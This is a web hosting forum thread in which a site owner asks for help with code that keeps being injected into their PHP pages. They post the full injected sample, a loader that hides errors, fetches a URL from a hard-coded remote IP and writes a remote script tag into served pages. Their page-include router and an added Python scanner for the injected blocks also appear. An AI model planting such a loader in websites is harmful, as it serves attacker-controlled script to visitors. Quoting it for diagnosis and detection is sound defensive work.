Badly need help stopping this malware from getting placed in
-
- A semi-regular
- Posts: 26
- https://www.youtube.com/channel/UC40BgXanDqOYoVCYFDSTfHA
- Joined: Tue Jul 20, 2010 1:42 pm
I have tried everything (even having a blank page as a website and deleting all of my other websites), and it still got injected!
This has been a problem for a long time now and I REALLY need some help.
It is clearly not insecure code in my website since, as I said, I left one website up with a blank index.php and it still got in!
Re: Badly need help stopping this malware from getting place
If you believe that there is malware on your webhosting, it would likely be a good idea to send in a support ticket to let them know about this. I would advise backing up all of your documents and compressing them in a zip or tarball, copying them somewhere safe, running a virus scan on the files, and then wiping all of the files from your web servers.
Re: Badly need help stopping this malware from getting place
I did all of that already and they told me to make a forum post.
Re: Badly need help stopping this malware from getting place
If you have a completely wiped webhosting account, then whoever is editing it must have your FTP login and password. You should perform a full malware check of your personal computer, update your OS, confirm that your firewall is working properly, and then change all your passwords.
Re: Badly need help stopping this malware from getting place
Is it that no one understands what I am saying? No one has wiped my web server. They keep injecting code into my webpages even if it is a blank page. No one has access. I have reset the password several times. I know I have no viruses on my computer. I have changed computers before. It is not a simple problem; quit acting like it is, please.
Re: Badly need help stopping this malware from getting place
Here is an example of one kind of injected code. There have been many variations, but this should give you an idea.
Code:
<?php
#c63448#
if (empty($jk)) {
error_reporting(0);
@ini_set('display_errors', 0);
if (!function_exists('__url_get_contents')) {
function __url_get_contents($remote_url, $timeout)
{
if (function_exists('curl_exec')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $remote_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
$_url_get_contents_data = curl_exec($ch);
curl_close($ch);
} elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen')) {
$ctx = @stream_context_create(array('http' =>
array(
'timeout' => $timeout,
)
));
$_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
} elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
$handle = @fopen($remote_url, "r");
$_url_get_contents_data = @stream_get_contents($handle);
} else {
$_url_get_contents_data = __file_get_url_contents($remote_url);
}
return $_url_get_contents_data;
}
}
if (!function_exists('__file_get_url_contents')) {
function __file_get_url_contents($remote_url)
{
if (preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
$remote_url, $matches)
) {
$protocol = strtolower($matches[1]);
$host = $matches[2];
$path = $matches[3];
} else {
// Bad remote_url-format
return FALSE;
}
if ($protocol == "http") {
$socket = @fsockopen($host, 80, $errno, $errstr, $timeout);
} else {
// Bad protocol
return FALSE;
}
if (!$socket) {
// Error creating socket
return FALSE;
}
$request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
$len_written = @fwrite($socket, $request);
if ($len_written === FALSE || $len_written != strlen($request)) {
// Error sending request
return FALSE;
}
$response = "";
while (!@feof($socket) &&
($buf = @fread($socket, 4096)) !== FALSE) {
$response .= $buf;
}
if ($buf === FALSE) {
// Error reading response
return FALSE;
}
$end_of_header = strpos($response, "\r\n\r\n");
return substr($response, $end_of_header + 4);
}
}
if (empty($__var_to_echo) && empty($remote_domain)) {
$jk = "http://46.244.10.234/b2.php";
$jk = __url_get_contents($jk, 1);
if (strpos($jk, 'http://') === 0) {
$__var_to_echo = '<script type="text/javascript" src="' . $jk . '?id=85335277"></script>';
echo $__var_to_echo;
}
}
}
#/c63448#
?>
<?php
?>
<?php
?>
<?php
?>
<?php
?>
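Added example, not part of the original thread: a Python scanner for a downloaded copy of the web root that reports every block delimited by a marker pair like the `#c63448#` / `#/c63448#` comments in the sample above, with its line range and the remote URLs it fetches. It assumes other variants keep the same marker shape with a different six-digit hex id; the function names and the sample file are constructed for illustration.

```python
import os
import re
import tempfile

# Marker pair as seen in the posted sample: "#c63448#" ... "#/c63448#".
# Assumption: variants keep this shape and only change the six hex digits.
BLOCK_RE = re.compile(r"#([0-9a-f]{6})#(.*?)#/\1#", re.DOTALL)
# Quoted absolute URLs inside the block (the loader's remote address).
URL_RE = re.compile(r"""["'](https?://[^"']+)["']""")

def find_injections(text):
    """Return one record per marker-delimited block found in text."""
    hits = []
    for m in BLOCK_RE.finditer(text):
        body = m.group(2)
        hits.append({
            "marker": m.group(1),
            "first_line": text.count("\n", 0, m.start()) + 1,
            "last_line": text.count("\n", 0, m.end()) + 1,
            "urls": URL_RE.findall(body),
            "hides_errors": "error_reporting(0)" in body,
        })
    return hits

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a local copy of the web root; map file path -> list of hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hits = find_injections(fh.read())
            if hits:
                report[path] = hits
    return report

# Constructed sample (not from the thread): marker id and address are placeholders.
SAMPLE = (
    "<?php\n#a1b2c3#\nif (empty($jk)) {\nerror_reporting(0);\n"
    '$jk = "http://192.0.2.10/x.php";\n}\n#/a1b2c3#\n?>\n<html></html>\n'
)

def demo():
    """Write one infected and one clean file to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for name, text in (("index.php", SAMPLE), ("clean.php", "<?php echo 'ok'; ?>\n")):
            with open(os.path.join(root, name), "w") as fh:
                fh.write(text)
        return {os.path.basename(p): h for p, h in scan_tree(root).items()}
```

Running `scan_tree()` on successive backups and comparing the reported files and modification times against the FTP and access logs helps narrow down when and through which channel the block is written.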
Re: Badly need help stopping this malware from getting place
Your site is most likely running vulnerable code. What services do you run, forum software, custom panels, etc?
Re: Badly need help stopping this malware from getting place
All I have done is used PHP to read from GET to tell the website what page to pull from. This way I could have a pages folder and put all my content pages in that pages folder (home, contact, about, etc) and just have the header and footer in that one index.php with PHP telling index.php which "content page" to load based off the GET variable set (I named mine p). An example would be http://webpage.com/?p=contact and that would make it so it would load the contact content from /pages/contact.php by doing include $page; Of course I made sure to do it as securely as possible, but no matter what it still causes this malware to get put in.
What bothers me most is that I have done this EXACT same code (listed below) on another webhost (to test this problem), and after a month I did not have a single issue.
Code:
<?php
// Print a message if the page name contains a dot.
if (strpos($_GET['p'], '.') !== false) {
    echo 'Either you are trying to hack with breakout, or you made a mistake. Either way, you need to try again';
}
// Empty or "home" maps to home.php; anything else maps to <p>.php.
if ($_GET['p'] == "" || $_GET['p'] == "home") {
    $targetfile = 'home.php';
} else {
    $targetfile = $_GET['p'].'.php';
}
$sdir = $_SERVER['DOCUMENT_ROOT'].'/pages/';
$filenames = scandir($sdir, 1);
ob_start();
// Include the file only if it is listed in /pages/; otherwise show the 404 page.
if (in_array($targetfile, $filenames)) {
    if ($_GET['p'] == "sendmail") {
        include "./libs/sendmail.php";
    } else {
        include $sdir.$targetfile;
    }
} else {
    include $sdir.'404.php';
}
$included_page = ob_get_clean();
?>
-
- This is my homepage
- Posts: 1573
- Joined: Sun Jun 26, 2011 8:03 am
Re: Badly need help stopping this malware from getting place
So how your login credentials were probably stolen.
Change your password for starters, and make it as complicated as possible.
Use some CAPS, odd characters like $%^&! and mix them all up.
Visit gspreviews.com And Rate & Review Your Old & Current GSP's
Find Your GSP Coupons at gspreviews.com/coupons/
Re: Badly need help stopping this malware from getting place
Did that already sir, but thanks for trying to help.
=QUACK=.Major.Pain wrote:
So how your login credentials were probably stolen.
Change your password for starters, and make it as complicated as possible.
Use some CAPS, odd characters like $%^&! and mix them all up.